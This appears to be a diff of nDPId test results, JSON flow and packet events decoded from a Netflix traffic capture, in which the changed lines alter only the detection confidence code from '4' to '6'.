00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1484319033259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033259,"pkt":"gCqoTGHM5JjWH70UCABFAAA0m4FAAEAG5U7AqAEHNCDEJM99AbszkZRh0pqER4AQEBVneAAAAQEICh9kuYW2m8Wo"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033631,"flow_last_seen":1484319033631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033631,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1484319033631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033631,"pkt":"gCqoTGHM5JjWH70UCABFAABAVMpAAEAGIQjAqAEHNkXM8c9+AbvPvqpAAAAAALAC\/\/9MiwAAAgQFtAEDAwUBAQgKH2S67gAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1484319033678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033678,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGi7Y2RczxwKgBBwG7z36\/HDHnz76qQaASRepQUQAAAgQFtAQCCAqFp1CVH2S67gEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1484319033680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033680,"pkt":"gCqoTGHM5JjWH70UCABFAAA0\/p1AAEAGd0DAqAEHNkXM8c9+AbvPvqpBvxwx6IAQEBW0wwAAAQEICh9kux6Fp1CV"} 
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1484319033886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319033886,"pkt":"AQBef\/\/65JjWH70UCABFAACWfwIAAAERiKvAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033886,"flow_last_seen":1484319033886,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1484319033886,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033943,"flow_last_seen":1484319033943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033943,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1484319033943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033943,"pkt":"gCqoTGHM5JjWH70UCABFAABAxzpAAEAGrpfAqAEHNkXM8c9\/Abtb3TwWAAAAALAC\/\/8tbQAAAgQFtAEDAwUBAQgKH2S8FwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1484319033988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033988,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z39IJeEpW908F6ASRer4mgAAAgQFtAQCCAqFp1DiH2S8FwEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1484319033990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033990,"pkt":"gCqoTGHM5JjWH70UCABFAAA0N8lAAEAGPhXAqAEHNkXM8c9\/Abtb3TwXSCXhKoAQEBVdDAAAAQEICh9kvEiFp1Di"} 
00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1484319033993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1484319033993,"pkt":"AQBef\/\/65JjWH70UCABFAACZ8KEAAAERFwnAqAEH7\/\/\/+tIQB2wAhUYzTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec 
Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 
00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1484319034890,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1484319034890,"pkt":"AQBef\/\/65JjWH70UCABGAAAgKLUAAAECSnnAqAEH7\/\/\/+pQEAAAWAPoE7\/\/\/+gAAAAAAAAAAAAAAAAAA"} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
